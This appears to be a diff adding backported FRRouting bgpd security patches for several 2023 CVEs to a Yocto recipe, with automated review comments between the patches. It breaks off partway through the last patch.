@@ -0,0 +1,160 @@ +From 72c13aac2eb7c8f3a10ad806d80ab635c28f4c04 Mon Sep 17 00:00:00 2001 +From: Donald Sharp <sharpd@nvidia.com> +Date: Wed, 21 Jun 2023 15:24:50 +0000 +Subject: [PATCH] bgpd: Ensure stream received has enough data + +BGP_PREFIX_SID_SRV6_L3_SERVICE attributes must not +fully trust the length value specified in the nlri. +Always ensure that the amount of data we need to read +can be fullfilled. + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donald Sharp <sharpd@nvidia.com> + +CVE: CVE-2023-31490 + +Upstream-Status: Backport [https://github.com/FRRouting/frr/pull/12454/commits/06431bfa7570f169637ebb5898f0b0cc3b010802] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + bgpd/bgp_attr.c | 79 ++++++++++++++++--------------------------------- + 1 file changed, 25 insertions(+), 54 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 2154baf4e..5d06991e2 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -2722,9 +2722,21 @@ static bgp_attr_parse_ret_t bgp_attr_psid_sub(uint8_t type, uint16_t length, + uint8_t sid_type, sid_flags; + char buf[BUFSIZ]; + ++ /* ++ * Check that we actually have at least as much data as ++ * specified by the length field ++ */ ++ if (STREAM_READABLE(peer->curr) < length) { ++ flog_err( ++ EC_BGP_ATTR_LEN, ++ "Prefix SID specifies length %hu, but only %zu bytes remain", ++ length, STREAM_READABLE(peer->curr)); ++ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR, ++ args->total); ++ } ++ + if (type == BGP_PREFIX_SID_LABEL_INDEX) { +- if (STREAM_READABLE(peer->curr) < length +- || length != BGP_PREFIX_SID_LABEL_INDEX_LENGTH) { ++ if (length != BGP_PREFIX_SID_LABEL_INDEX_LENGTH) { + flog_err(EC_BGP_ATTR_LEN, + "Prefix SID label index length is %hu instead of %u", + length, BGP_PREFIX_SID_LABEL_INDEX_LENGTH); +@@ -2746,12 +2758,8 @@ static bgp_attr_parse_ret_t bgp_attr_psid_sub(uint8_t type, uint16_t length, + /* Store label index; subsequently, we'll check on 
+ * address-family */ + attr->label_index = label_index; +- } +- +- /* Placeholder code for the IPv6 SID type */ +- else if (type == BGP_PREFIX_SID_IPV6) { +- if (STREAM_READABLE(peer->curr) < length +- || length != BGP_PREFIX_SID_IPV6_LENGTH) { ++ } else if (type == BGP_PREFIX_SID_IPV6) { ++ if (length != BGP_PREFIX_SID_IPV6_LENGTH) { + flog_err(EC_BGP_ATTR_LEN, + "Prefix SID IPv6 length is %hu instead of %u", + length, BGP_PREFIX_SID_IPV6_LENGTH); +@@ -2765,10 +2773,7 @@ static bgp_attr_parse_ret_t bgp_attr_psid_sub(uint8_t type, uint16_t length, + stream_getw(peer->curr); + + stream_get(&ipv6_sid, peer->curr, 16); +- } +- +- /* Placeholder code for the Originator SRGB type */ +- else if (type == BGP_PREFIX_SID_ORIGINATOR_SRGB) { ++ } else if (type == BGP_PREFIX_SID_ORIGINATOR_SRGB) { + /* + * ietf-idr-bgp-prefix-sid-05: + * Length is the total length of the value portion of the +@@ -2793,19 +2798,6 @@ static bgp_attr_parse_ret_t bgp_attr_psid_sub(uint8_t type, uint16_t length, + args->total); + } + +- /* +- * Check that we actually have at least as much data as +- * specified by the length field +- */ +- if (STREAM_READABLE(peer->curr) < length) { +- flog_err(EC_BGP_ATTR_LEN, +- "Prefix SID Originator SRGB specifies length %hu, but only %zu bytes remain", +- length, STREAM_READABLE(peer->curr)); +- return bgp_attr_malformed( +- args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR, +- args->total); +- } +- + /* + * Check that the portion of the TLV containing the sequence of + * SRGBs corresponds to a multiple of the SRGB size; to get +@@ -2829,12 +2821,8 @@ static bgp_attr_parse_ret_t bgp_attr_psid_sub(uint8_t type, uint16_t length, + stream_get(&srgb_base, peer->curr, 3); + stream_get(&srgb_range, peer->curr, 3); + } +- } +- +- /* Placeholder code for the VPN-SID Service type */ +- else if (type == BGP_PREFIX_SID_VPN_SID) { +- if (STREAM_READABLE(peer->curr) < length +- || length != BGP_PREFIX_SID_VPN_SID_LENGTH) { ++ } else if (type == BGP_PREFIX_SID_VPN_SID) { ++ if (length 
!= BGP_PREFIX_SID_VPN_SID_LENGTH) { + flog_err(EC_BGP_ATTR_LEN, + "Prefix SID VPN SID length is %hu instead of %u", + length, BGP_PREFIX_SID_VPN_SID_LENGTH); +@@ -2870,39 +2858,22 @@ static bgp_attr_parse_ret_t bgp_attr_psid_sub(uint8_t type, uint16_t length, + attr->srv6_vpn->sid_flags = sid_flags; + sid_copy(&attr->srv6_vpn->sid, &ipv6_sid); + attr->srv6_vpn = srv6_vpn_intern(attr->srv6_vpn); +- } +- +- /* Placeholder code for the SRv6 L3 Service type */ +- else if (type == BGP_PREFIX_SID_SRV6_L3_SERVICE) { +- if (STREAM_READABLE(peer->curr) < length) { ++ } else if (type == BGP_PREFIX_SID_SRV6_L3_SERVICE) { ++ if (STREAM_READABLE(peer->curr) < 1) { + flog_err( + EC_BGP_ATTR_LEN, +- "Prefix SID SRv6 L3-Service length is %hu, but only %zu bytes remain", +- length, STREAM_READABLE(peer->curr)); +- return bgp_attr_malformed(args, +- BGP_NOTIFY_UPDATE_ATTR_LENG_ERR, +- args->total); ++ "Prefix SID SRV6 L3 Service not enough data left, it must be at least 1 byte"); ++ return bgp_attr_malformed( ++ args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR, ++ args->total); + } +- + /* ignore reserved */ + stream_getc(peer->curr); + + return bgp_attr_srv6_service(args); + } +- + /* Placeholder code for Unsupported TLV */ + else { +- +- if (STREAM_READABLE(peer->curr) < length) { +- flog_err( +- EC_BGP_ATTR_LEN, +- "Prefix SID SRv6 length is %hu - too long, only %zu remaining in this UPDATE", +- length, STREAM_READABLE(peer->curr)); +- return bgp_attr_malformed( +- args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR, +- args->total); +- } +- + if (bgp_debug_update(peer, NULL, NULL, 1)) + zlog_debug( + "%s attr Prefix-SID sub-type=%u is not supported, skipped", +-- +2.40.0 diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-38406.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-38406.patch new file mode 100644 index 0000000000..9d5f306fe4 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-38406.patch 
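Review bot: In the BGP_PREFIX_SID_SRV6_L3_SERVICE branch the new guard tests `STREAM_READABLE(peer->curr) < 1`, but the check hoisted to the top of bgp_attr_psid_sub already guarantees that `length` bytes are readable, so the case actually left open is `length == 0`. With a zero-length TLV and more data in the stream, `stream_getc(peer->curr)` consumes a byte that belongs to whatever follows this TLV. Testing the declared length instead, `if (length < 1) {`, would reject that input. Whether bgp_attr_srv6_service() re-validates the remaining length is not visible here.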
@@ -0,0 +1,42 @@ +From f2a5c583fc8f7c515f3d6e6f929dcbcc61f7e4b7 Mon Sep 17 00:00:00 2001 +From: Donald Sharp <sharpd@nvidia.com> +Date: Mon, 20 Nov 2023 11:43:27 +0000 +Subject: [PATCH 1/6] bgpd: Flowspec overflow issue + +According to the flowspec RFC 8955 a flowspec nlri is <length, <nlri data>> +Specifying 0 as a length makes BGP get all warm on the inside. Which +in this case is not a good thing at all. Prevent warmth, stay cold +on the inside. + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donald Sharp <sharpd@nvidia.com> + +CVE: CVE-2023-38406 + +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/0b999c886e241c52bd1f7ef0066700e4b618ebb3] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + bgpd/bgp_flowspec.c | 7 +++++++ + 1 file changed, 7 insertions(+) + +diff --git a/bgpd/bgp_flowspec.c b/bgpd/bgp_flowspec.c +index 3e2b1ac49..95fbd340a 100644 +--- a/bgpd/bgp_flowspec.c ++++ b/bgpd/bgp_flowspec.c +@@ -148,6 +148,13 @@ int bgp_nlri_parse_flowspec(struct peer *peer, struct attr *attr, + psize); + return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW; + } ++ ++ if (psize == 0) { ++ flog_err(EC_BGP_FLOWSPEC_PACKET, ++ "Flowspec NLRI length 0 which makes no sense"); ++ return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW; ++ } ++ + if (bgp_fs_nlri_validate(pnt, psize, afi) < 0) { + flog_err( + EC_BGP_FLOWSPEC_PACKET, +-- +2.40.0 diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-38407.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-38407.patch new file mode 100644 index 0000000000..782b44615a --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-38407.patch 
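Review bot: The new `psize == 0` error is logged without identifying the neighbour, so an operator cannot tell which peer sent the malformed flowspec NLRI. `peer` is a parameter of bgp_nlri_parse_flowspec, so the call could be `flog_err(EC_BGP_FLOWSPEC_PACKET, "%s: Flowspec NLRI length 0 which makes no sense", peer->host);`. The return value BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW is reused here for a zero length rather than an overflow; a short comment explaining the reuse would help the next reader. The function continues outside the hunk.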
@@ -0,0 +1,63 @@ +From 3880f66bd053d1f56af74852ca57ba166d880920 Mon Sep 17 00:00:00 2001 +From: Donald Sharp <sharpd@nvidia.com> +Date: Mon, 20 Nov 2023 12:03:29 +0000 +Subject: [PATCH 2/6] bgpd: Fix use beyond end of stream of labeled unicast + parsing + +Fixes a couple crashes associated with attempting to read +beyond the end of the stream. + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donald Sharp <sharpd@nvidia.com> + +CVE: CVE-2023-38407 + +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/7404a914b0cafe046703c8381903a80d3def8f8b] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + bgpd/bgp_label.c | 15 +++++++++++++++ + 1 file changed, 15 insertions(+) + +diff --git a/bgpd/bgp_label.c b/bgpd/bgp_label.c +index 4a20f2c09..b65c98e86 100644 +--- a/bgpd/bgp_label.c ++++ b/bgpd/bgp_label.c +@@ -299,6 +299,9 @@ static int bgp_nlri_get_labels(struct peer *peer, uint8_t *pnt, uint8_t plen, + uint8_t llen = 0; + uint8_t label_depth = 0; + ++ if (plen < BGP_LABEL_BYTES) ++ return 0; ++ + for (; data < lim; data += BGP_LABEL_BYTES) { + memcpy(label, data, BGP_LABEL_BYTES); + llen += BGP_LABEL_BYTES; +@@ -361,6 +364,9 @@ int bgp_nlri_parse_label(struct peer *peer, struct attr *attr, + memcpy(&addpath_id, pnt, BGP_ADDPATH_ID_LEN); + addpath_id = ntohl(addpath_id); + pnt += BGP_ADDPATH_ID_LEN; ++ ++ if (pnt >= lim) ++ return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW; + } + + /* Fetch prefix length. 
*/ +@@ -379,6 +385,15 @@ int bgp_nlri_parse_label(struct peer *peer, struct attr *attr, + + /* Fill in the labels */ + llen = bgp_nlri_get_labels(peer, pnt, psize, &label); ++ if (llen == 0) { ++ flog_err( ++ EC_BGP_UPDATE_RCV, ++ "%s [Error] Update packet error (wrong label length 0)", ++ peer->host); ++ bgp_notify_send(peer, BGP_NOTIFY_UPDATE_ERR, ++ BGP_NOTIFY_UPDATE_INVAL_NETWORK); ++ return BGP_NLRI_PARSE_ERROR_LABEL_LENGTH; ++ } + p.prefixlen = prefixlen - BSIZE(llen); + + /* There needs to be at least one label */ +-- +2.40.0 diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-38802.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-38802.patch new file mode 100644 index 0000000000..60801bf06e --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-38802.patch 
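Review bot: The added `if (plen < BGP_LABEL_BYTES) return 0;` in bgp_nlri_get_labels covers only the first label; the loop still runs while `data < lim` and then copies BGP_LABEL_BYTES, so when fewer than three bytes remain before `lim` on a later iteration the memcpy reads past it. Assuming `lim` is `pnt + plen` (it is set outside the hunk), tightening the loop condition to `data + BGP_LABEL_BYTES <= lim` would bound every iteration. The loop's exit conditions are also outside this hunk, so confirm whether an existing check already stops the loop before that point.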
@@ -0,0 +1,136 @@ +From ad32e04f3db364694edc678327326ae6b771db9e Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis <donatas@opensourcerouting.org> +Date: Tue, 5 Sep 2023 11:30:53 +0000 +Subject: [PATCH 1/2] bgpd: Use treat-as-withdraw for tunnel encapsulation + attribute + +Before this path we used session reset method, which is discouraged by rfc7606. + +Handle this as rfc requires. + +Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> + +CVE: CVE-2023-38802 + +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/bcb6b58d9530173df41d3a3cbc4c600ee0b4b186] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + bgpd/bgp_attr.c | 61 ++++++++++++++++++++----------------------------- + 1 file changed, 25 insertions(+), 36 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 5d06991e2..b10a60351 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -1310,6 +1310,7 @@ bgp_attr_malformed(struct bgp_attr_parser_args *args, uint8_t subcode, + case BGP_ATTR_LARGE_COMMUNITIES: + case BGP_ATTR_ORIGINATOR_ID: + case BGP_ATTR_CLUSTER_LIST: ++ case BGP_ATTR_ENCAP: + return BGP_ATTR_PARSE_WITHDRAW; + case BGP_ATTR_MP_REACH_NLRI: + case BGP_ATTR_MP_UNREACH_NLRI: +@@ -2411,26 +2412,21 @@ bgp_attr_ipv6_ext_communities(struct bgp_attr_parser_args *args) + } + + /* Parse Tunnel Encap attribute in an UPDATE */ +-static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */ +- bgp_size_t length, /* IN: attr's length field */ +- struct attr *attr, /* IN: caller already allocated */ +- uint8_t flag, /* IN: attr's flags field */ +- uint8_t *startp) ++static int bgp_attr_encap(struct bgp_attr_parser_args *args) + { +- bgp_size_t total; + uint16_t tunneltype = 0; +- +- total = length + (CHECK_FLAG(flag, BGP_ATTR_FLAG_EXTLEN) ? 
4 : 3); ++ struct peer *const peer = args->peer; ++ struct attr *const attr = args->attr; ++ bgp_size_t length = args->length; ++ uint8_t type = args->type; ++ uint8_t flag = args->flags; + + if (!CHECK_FLAG(flag, BGP_ATTR_FLAG_TRANS) + || !CHECK_FLAG(flag, BGP_ATTR_FLAG_OPTIONAL)) { +- zlog_info( +- "Tunnel Encap attribute flag isn't optional and transitive %d", +- flag); +- bgp_notify_send_with_data(peer, BGP_NOTIFY_UPDATE_ERR, +- BGP_NOTIFY_UPDATE_ATTR_FLAG_ERR, +- startp, total); +- return -1; ++ zlog_err("Tunnel Encap attribute flag isn't optional and transitive %d", ++ flag); ++ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, ++ args->total); + } + + if (BGP_ATTR_ENCAP == type) { +@@ -2438,12 +2434,11 @@ static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */ + uint16_t tlv_length; + + if (length < 4) { +- zlog_info( ++ zlog_err( + "Tunnel Encap attribute not long enough to contain outer T,L"); +- bgp_notify_send_with_data( +- peer, BGP_NOTIFY_UPDATE_ERR, +- BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, startp, total); +- return -1; ++ return bgp_attr_malformed(args, ++ BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, ++ args->total); + } + tunneltype = stream_getw(BGP_INPUT(peer)); + tlv_length = stream_getw(BGP_INPUT(peer)); +@@ -2473,13 +2468,11 @@ static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */ + } + + if (sublength > length) { +- zlog_info( +- "Tunnel Encap attribute sub-tlv length %d exceeds remaining length %d", +- sublength, length); +- bgp_notify_send_with_data( +- peer, BGP_NOTIFY_UPDATE_ERR, +- BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, startp, total); +- return -1; ++ zlog_err("Tunnel Encap attribute sub-tlv length %d exceeds remaining length %d", ++ sublength, length); ++ return bgp_attr_malformed(args, ++ BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, ++ args->total); + } + + /* alloc and copy sub-tlv */ +@@ -2527,13 +2520,10 @@ static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */ + + if (length) { + /* spurious leftover data */ +- 
zlog_info( +- "Tunnel Encap attribute length is bad: %d leftover octets", +- length); +- bgp_notify_send_with_data(peer, BGP_NOTIFY_UPDATE_ERR, +- BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, +- startp, total); +- return -1; ++ zlog_err("Tunnel Encap attribute length is bad: %d leftover octets", ++ length); ++ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, ++ args->total); + } + + return 0; +@@ -3332,8 +3322,7 @@ bgp_attr_parse_ret_t bgp_attr_parse(struct peer *peer, struct attr *attr, + case BGP_ATTR_VNC: + #endif + case BGP_ATTR_ENCAP: +- ret = bgp_attr_encap(type, peer, length, attr, flag, +- startp); ++ ret = bgp_attr_encap(&attr_args); + break; + case BGP_ATTR_PREFIX_SID: + ret = bgp_attr_prefix_sid(&attr_args); +-- +2.40.0 diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-41358.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-41358.patch new file mode 100644 index 0000000000..e10d3e5267 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-41358.patch 
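Review bot: The flag check in bgp_attr_encap used to report BGP_NOTIFY_UPDATE_ATTR_FLAG_ERR and now passes BGP_NOTIFY_UPDATE_OPT_ATTR_ERR to bgp_attr_malformed. For BGP_ATTR_ENCAP this patch maps malformed attributes to BGP_ATTR_PARSE_WITHDRAW, so the subcode may never be sent, but the same function is reached from the `case BGP_ATTR_VNC:` label, which is not added to that list in the visible lines. Keeping the original subcode, `return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_ATTR_FLAG_ERR, args->total);`, preserves the error a peer would see in that case. The move from zlog_info to zlog_err also raises the level of messages a remote peer can trigger at will; check that existing rate limiting covers them.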
@@ -0,0 +1,105 @@ +From ef9b66e742f9016b3bf283920b528cf20d2c969f Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis <donatas@opensourcerouting.org> +Date: Tue, 5 Sep 2023 11:36:13 +0000 +Subject: [PATCH 2/2] bgpd: Do not process NLRIs if the attribute length is + zero + +``` +3 0x00007f423aa42476 in __GI_raise (sig=sig@entry=11) at ../sysdeps/posix/raise.c:26 +4 0x00007f423aef9740 in core_handler (signo=11, siginfo=0x7fffc414deb0, context=<optimized out>) at lib/sigevent.c:246 +5 <signal handler called> +6 0x0000564dea2fc71e in route_set_aspath_prepend (rule=0x564debd66d50, prefix=0x7fffc414ea30, object=0x7fffc414e400) + at bgpd/bgp_routemap.c:2258 +7 0x00007f423aeec7e0 in route_map_apply_ext (map=<optimized out>, prefix=prefix@entry=0x7fffc414ea30, + match_object=match_object@entry=0x7fffc414e400, set_object=set_object@entry=0x7fffc414e400, pref=pref@entry=0x0) at lib/routemap.c:2690 +8 0x0000564dea2d277e in bgp_input_modifier (peer=peer@entry=0x7f4238f59010, p=p@entry=0x7fffc414ea30, attr=attr@entry=0x7fffc414e770, + afi=afi@entry=AFI_IP, safi=safi@entry=SAFI_UNICAST, rmap_name=rmap_name@entry=0x0, label=0x0, num_labels=0, dest=0x564debdd5130) + at bgpd/bgp_route.c:1772 +9 0x0000564dea2df762 in bgp_update (peer=peer@entry=0x7f4238f59010, p=p@entry=0x7fffc414ea30, addpath_id=addpath_id@entry=0, + attr=0x7fffc414eb50, afi=afi@entry=AFI_IP, safi=<optimized out>, safi@entry=SAFI_UNICAST, type=9, sub_type=0, prd=0x0, label=0x0, + num_labels=0, soft_reconfig=0, evpn=0x0) at bgpd/bgp_route.c:4374 +10 0x0000564dea2e2047 in bgp_nlri_parse_ip (peer=0x7f4238f59010, attr=attr@entry=0x7fffc414eb50, packet=0x7fffc414eaf0) + at bgpd/bgp_route.c:6249 +11 0x0000564dea2c5a58 in bgp_nlri_parse (peer=peer@entry=0x7f4238f59010, attr=attr@entry=0x7fffc414eb50, + packet=packet@entry=0x7fffc414eaf0, mp_withdraw=mp_withdraw@entry=false) at bgpd/bgp_packet.c:339 +12 0x0000564dea2c5d66 in bgp_update_receive (peer=peer@entry=0x7f4238f59010, size=size@entry=109) at bgpd/bgp_packet.c:2024 +13 
0x0000564dea2c901d in bgp_process_packet (thread=<optimized out>) at bgpd/bgp_packet.c:2933 +14 0x00007f423af0bf71 in event_call (thread=thread@entry=0x7fffc414ee40) at lib/event.c:1995 +15 0x00007f423aebb198 in frr_run (master=0x564deb73c670) at lib/libfrr.c:1213 +16 0x0000564dea261b83 in main (argc=<optimized out>, argv=<optimized out>) at bgpd/bgp_main.c:505 +``` + +With the configuration: + +``` +frr version 9.1-dev-MyOwnFRRVersion +frr defaults traditional +hostname ip-172-31-13-140 +log file /tmp/debug.log +log syslog +service integrated-vtysh-config +! +debug bgp keepalives +debug bgp neighbor-events +debug bgp updates in +debug bgp updates out +! +router bgp 100 + bgp router-id 9.9.9.9 + no bgp ebgp-requires-policy + bgp bestpath aigp + neighbor 172.31.2.47 remote-as 200 + ! + address-family ipv4 unicast + neighbor 172.31.2.47 default-originate + neighbor 172.31.2.47 route-map RM_IN in + exit-address-family +exit +! +route-map RM_IN permit 10 + set as-path prepend 200 +exit +! +``` + +The issue is that we try to process NLRIs even if the attribute length is 0. + +Later bgp_update() will handle route-maps and a crash occurs because all the +attributes are NULL, including aspath, where we dereference. + +According to the RFC 4271: + +A value of 0 indicates that neither the Network Layer + Reachability Information field nor the Path Attribute field is + present in this UPDATE message. + +But with a fuzzed UPDATE message this can be faked. I think it's reasonable +to skip processing NLRIs if both update_len and attribute_len are 0. 
+ +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> + +CVE: CVE-2023-41358 + +Upstream-Status: Backport [https://github.com/FRRouting/frr/pull/14260/commits/28ccc24d38df1d51ed8a563507e5d6f6171fdd38] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + bgpd/bgp_packet.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c +index 0166dc6a2..2fd28aae3 100644 +--- a/bgpd/bgp_packet.c ++++ b/bgpd/bgp_packet.c +@@ -1767,7 +1767,7 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size) + /* Network Layer Reachability Information. */ + update_len = end - stream_pnt(s); + +- if (update_len) { ++ if (update_len && attribute_len) { + /* Set NLRI portion to structure. */ + nlris[NLRI_UPDATE].afi = AFI_IP; + nlris[NLRI_UPDATE].safi = SAFI_UNICAST; +-- +2.40.0 diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-41909.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-41909.patch new file mode 100644 index 0000000000..b27d7af166 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-41909.patch 
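Review bot: With `if (update_len && attribute_len)` an UPDATE that carries NLRI bytes but a zero attribute length is skipped without any log line, so the malformed message leaves no trace for the operator. An `else if (update_len)` branch calling `flog_warn(EC_BGP_UPDATE_RCV, "%s: UPDATE has NLRI but no path attributes, NLRI ignored", peer->host);` would keep the crash fix and make the event visible. The commit message speaks of skipping when both lengths are 0, while the condition skips whenever `attribute_len` is 0; the description should match the code. bgp_update_receive continues outside the hunk, so a later check that already reports this case cannot be ruled out from here.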
@@ -0,0 +1,42 @@ +From 5966b6a1fc72d3698d08199922cc4f42ea7fc9eb Mon Sep 17 00:00:00 2001 +From: Donald Sharp <sharpd@nvidia.com> +Date: Fri, 8 Sep 2023 11:46:12 +0000 +Subject: [PATCH] bgpd: Limit flowspec to no attribute means a implicit + withdrawal + +All other parsing functions done from bgp_nlri_parse() assume +no attributes == an implicit withdrawal. Let's move +bgp_nlri_parse_flowspec() into the same alignment. + +Reported-by: Matteo Memelli <mmemelli@amazon.it> +Signed-off-by: Donald Sharp <sharpd@nvidia.com> + +CVE: CVE-2023-41909 + +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/cfd04dcb3e689754a72507d086ba3b9709fc5ed8] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + bgpd/bgp_flowspec.c | 7 +++++++ + 1 file changed, 7 insertions(+) + +diff --git a/bgpd/bgp_flowspec.c b/bgpd/bgp_flowspec.c +index 341cfe9d0..3e2b1ac49 100644 +--- a/bgpd/bgp_flowspec.c ++++ b/bgpd/bgp_flowspec.c +@@ -112,6 +112,13 @@ int bgp_nlri_parse_flowspec(struct peer *peer, struct attr *attr, + afi = packet->afi; + safi = packet->safi; + ++ /* ++ * All other AFI/SAFI's treat no attribute as a implicit ++ * withdraw. Flowspec should as well. ++ */ ++ if (!attr) ++ withdraw = 1; ++ + if (packet->length >= FLOWSPEC_NLRI_SIZELIMIT_EXTENDED) { + flog_err(EC_BGP_FLOWSPEC_PACKET, + "BGP flowspec nlri length maximum reached (%u)", +-- +2.40.0 diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-46752.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-46752.patch new file mode 100644 index 0000000000..17ba41037c --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-46752.patch 
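Review bot: This patch and CVE-2023-38406.patch both modify bgp_nlri_parse_flowspec, and their index lines chain: this one produces blob 3e2b1ac49, which CVE-2023-38406.patch takes as its base. The recipe's SRC_URI (not visible in this part of the diff) therefore has to list this patch first, and a comment next to the entries saying so would stop a later reorder from making the patches apply with fuzz or fail. The same chaining is visible for the bgp_attr.c patches (CVE-2023-31490, CVE-2023-38802, CVE-2023-46752, CVE-2023-46753) and is worth covering in the same comment.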
@@ -0,0 +1,127 @@ +From 1c4882b83a1db705abd5d384dd0b7ef4c0e3b4ee Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis <donatas@opensourcerouting.org> +Date: Mon, 20 Nov 2023 14:11:13 +0000 +Subject: [PATCH 3/6] bgpd: Handle MP_REACH_NLRI malformed packets with session + reset + +Avoid crashing bgpd. + +``` +(gdb) +bgp_mp_reach_parse (args=<optimized out>, mp_update=0x7fffffffe140) at bgpd/bgp_attr.c:2341 +2341 stream_get(&attr->mp_nexthop_global, s, IPV6_MAX_BYTELEN); +(gdb) +stream_get (dst=0x7fffffffe1ac, s=0x7ffff0006e80, size=16) at lib/stream.c:320 +320 { +(gdb) +321 STREAM_VERIFY_SANE(s); +(gdb) +323 if (STREAM_READABLE(s) < size) { +(gdb) +34 return __builtin___memcpy_chk (__dest, __src, __len, __bos0 (__dest)); +(gdb) + +Thread 1 "bgpd" received signal SIGSEGV, Segmentation fault. +0x00005555556e37be in route_set_aspath_prepend (rule=0x555555aac0d0, prefix=0x7fffffffe050, + object=0x7fffffffdb00) at bgpd/bgp_routemap.c:2282 +2282 if (path->attr->aspath->refcnt) +(gdb) +``` + +With the configuration: + +``` + neighbor 127.0.0.1 remote-as external + neighbor 127.0.0.1 passive + neighbor 127.0.0.1 ebgp-multihop + neighbor 127.0.0.1 disable-connected-check + neighbor 127.0.0.1 update-source 127.0.0.2 + neighbor 127.0.0.1 timers 3 90 + neighbor 127.0.0.1 timers connect 1 + address-family ipv4 unicast + redistribute connected + neighbor 127.0.0.1 default-originate + neighbor 127.0.0.1 route-map RM_IN in + exit-address-family +! 
+route-map RM_IN permit 10 + set as-path prepend 200 +exit +``` + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> + +CVE: CVE-2023-46752 + +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/b08afc81c60607a4f736f418f2e3eb06087f1a35] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + bgpd/bgp_attr.c | 6 +----- + bgpd/bgp_attr.h | 1 - + bgpd/bgp_packet.c | 6 +----- + 3 files changed, 2 insertions(+), 11 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index b10a60351..e0542356c 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -2207,7 +2207,7 @@ int bgp_mp_reach_parse(struct bgp_attr_parser_args *args, + + mp_update->afi = afi; + mp_update->safi = safi; +- return BGP_ATTR_PARSE_EOR; ++ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_MAL_ATTR, 0); + } + + mp_update->afi = afi; +@@ -3345,10 +3345,6 @@ bgp_attr_parse_ret_t bgp_attr_parse(struct peer *peer, struct attr *attr, + goto done; + } + +- if (ret == BGP_ATTR_PARSE_EOR) { +- goto done; +- } +- + if (ret == BGP_ATTR_PARSE_ERROR) { + flog_warn(EC_BGP_ATTRIBUTE_PARSE_ERROR, + "%s: Attribute %s, parse error", peer->host, +diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h +index 781bfdec3..69f962134 100644 +--- a/bgpd/bgp_attr.h ++++ b/bgpd/bgp_attr.h +@@ -378,7 +378,6 @@ typedef enum { + /* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR + */ + BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3, +- BGP_ATTR_PARSE_EOR = -4, + } bgp_attr_parse_ret_t; + + struct bpacket_attr_vec_arr; +diff --git a/bgpd/bgp_packet.c 